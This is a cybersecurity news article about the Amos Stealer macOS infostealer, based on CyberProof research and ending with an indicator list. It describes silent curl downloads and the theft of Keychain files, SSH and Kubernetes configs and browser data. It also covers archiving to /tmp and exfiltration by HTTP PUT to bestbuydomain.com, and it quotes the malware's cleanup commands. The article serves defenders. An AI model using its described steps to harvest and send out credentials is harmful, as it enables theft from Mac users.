Amos Stealer Targets macOS Keychain Files and Browser Passwords

Summary

Amos Stealer, an information-stealing malware, is actively targeting macOS users through deceptive downloads and social engineering. The malware silently collects browser passwords, Keychain files, developer configurations, and session cookies. It utilizes built-in macOS utilities like curl and AppleScript to exfiltrate data, compressing it into an archive before sending it to attacker-controlled servers.

Full text

Security MalwareAmos Stealer Targets macOS Keychain Files and Browser Passwords Amos Stealer targets macOS users through fake downloads, stealing Keychain files, browser passwords, cookies, and developer configs for data theft. byDeeba AhmedJune 16, 20262 minute read Amos Stealer, an information-stealing malware, is targeting Apple Mac computers to steal private data, according to new details from cybersecurity research firm CyberProof. Threat actors are, reportedly, actively using this malware family to run financially motivated campaigns by compromising macOS environments. Although Amos Stealer is not new, in the latest campaign, the threat actors are distributing the infostealer through deceptive software downloads, fake websites, and social engineering lures. Once inside a Mac, it searches for valuable files across system directories. It then collects stored passwords, session cookies, and autofill form information from Google Chrome and Microsoft Edge browsers. Silent Download Methods Researchers noted that the malware operators use a built-in macOS utility called curl to download the malicious files silently. During a recent incident investigation, a threat hunting query flagged an unusual curl command. They noted that, while identifying the specific server address that cybercriminals were using to fetch the malicious script, as: Further probing revealed that the hackers used specific command flags -fsSL to make the download completely invisible to the user. These flags stop error alerts, turn off download progress bars, and ensure the script runs quietly. Once the script is downloaded, it automatically launches an AppleScript command using the zsh terminal shell to begin collecting data. “Amos Stealer remains a prominent and highly active malware family specifically engineered to target macOS users and extract sensitive information from compromised systems,” researchers explained in the blog post shared with Hackread.com. Data Stealing and Cleanup Investigation also revealed that the info-stealer copies the macOS Keychain database file, named login.keychain-db, to access saved corporate login details. It also searches the user’s home path for confidential developer configuration files and keys, including .kube, .ssh, .zshrc, and .gitconfig. To prepare the data for the hackers, the malware uses a native macOS tool called ditto to compress the stolen files into a single archive named osalogging.zip inside the /tmp folder. This file is divided into 10 MB chunks by the script, and a unique session ID is generated for the upload by mixing the current timestamp with a random hexadecimal string from OpenSSL. Amos Stealer Exploiting macOS utilities to exfiltrate data (source: CyberProof) Amos Stealer then sends the data to the attacker-controlled server address (bestbuydomain.com) using an HTTP PUT request via curl. A notable aspect is that the system retries failed uploads up to eight times. After a successful upload, Amos Stealer runs the cleanup commands (rm -f /tmp/osalogging.zip and rm -rf /tmp/sync) to erase its presence. This silent type of cyberattack allows threat actors to easily steal saved credentials, which can leave compromised corporate networks exposed to data breaches and financial theft. CyberProof recommends that companies enforce strict Gatekeeper policies and monitor endpoints for strange curl commands to block these threat actors. Deeba Ahmed Deeba is a veteran cybersecurity reporter at Hackread.com with over a decade of experience covering cybercrime, vulnerabilities, and security events. Her expertise and in-depth analysis make her a key contributor to the platform’s trusted coverage. View Posts AMOS StealerCyberProofCybersecurityInfostealerKeychainmacOSMalwareScamSocial Engineering Leave a Reply Cancel reply View Comments (0) Related Posts Read More Security Phishing Scam Fake Avast Website Targets Users With €499 Phishing Refund Scam Fraudsters clone Avast’s website to target French users with a €499 phishing scam, using urgency tactics, live chat, and card validation to steal payment data. byDeeba Ahmed How To Malware How to identify malware on your phone with these 7 signs Malware and spyware are two security issues most commonly associated with desktop computers. Here's how to identify on your smartphone... byUzair Amir Cyber Crime Hacking News Scams and Fraud Security Arrested LinkedIn Hacker Accused of Hacking DropBox, Stealing Bitcoins Turns out the Russian hacker accused of LinkedIn hack is a bigger fish than expected — The indictment… byWaqas Cyber Crime Malware Japanese police to charge scammers with crypto mining without consent The investigators believe that the case involving crypto mining is a violation of the law banning the use… byWaqas

Indicators of Compromise

• domain — bestbuydomain.com
• malware — Amos Stealer

Entities